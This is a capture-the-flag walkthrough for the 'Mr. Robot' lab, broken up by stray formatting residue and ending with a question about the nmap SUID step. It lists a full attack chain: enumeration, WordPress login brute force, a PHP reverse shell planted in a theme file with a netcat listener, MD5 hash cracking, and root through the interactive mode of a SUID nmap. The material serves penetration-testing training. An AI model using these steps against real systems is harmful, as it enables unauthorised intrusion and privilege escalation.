Mr. Robot CTF

1606070;"># Step 1: Enumeration
2nmap -sV TARGET_IP
3606070;"># 80 HTTP, 443 HTTPS
4 
5606070;"># Web enumeration
6gobuster dir -u http:606070;">//TARGET_IP -w /usr/share/wordlists/dirb/common.txt
7606070;"># Found: /robots.txt, /wp-admin
8 
9606070;"># Check robots.txt
10curl http:606070;">//TARGET_IP/robots.txt
11606070;"># fsocity.dic (wordlist!)
12606070;"># key-1-of-3.txt (First key!)
13 
14606070;"># Download wordlist
15wget http:606070;">//TARGET_IP/fsocity.dic
16 
17606070;"># Step 2: WordPress Exploitation
18606070;"># WPScan for users
19wpscan --url http:606070;">//TARGET_IP --enumerate u
20 
21606070;"># Brute force login with wordlist
22606070;"># First, clean wordlist (remove duplicates)
23sort fsocity.dic | uniq > wordlist.txt
24 
25606070;"># Brute force (takes time!)
26wpscan --url http:606070;">//TARGET_IP --usernames elliot --passwords wordlist.txt
27 
28606070;"># Found: elliot:ER28-0652
29 
30606070;"># Step 3: WordPress Shell
31606070;"># Login to wp-admin
32606070;"># Appearance > Editor > 404.php
33606070;"># Replace with PHP reverse shell
34 
35nc -lvnp 4444
36606070;"># Visit: http://TARGET_IP/wp-content/themes/twentyfifteen/404.php
37 
38606070;"># Step 4: Find Key 2
39cd /home/robot
40cat key-2-of-3.txt
41606070;"># Permission denied - owned by robot
42 
43ls -la
44606070;"># Found: password.raw-md5
45 
46cat password.raw-md5
47606070;"># robot:c3fcd3d76192e4007dfb496cca67e13b
48 
49606070;"># Crack with hashcat or online
50606070;"># Password: abcdefghijklmnopqrstuvwxyz
51 
52su robot
53cat key-2-of-3.txt
54 
55606070;"># Step 5: Privilege Escalation
56find / -perm -u=s -type f 2>/dev/null
57606070;"># Found: /usr/local/bin/nmap (old version with interactive mode!)
58 
59/usr/local/bin/nmap --interactive
60nmap> !sh
61606070;"># Root!
62 
63cat /root/key-3-of-3.txt

How was the nmap SUID exploited?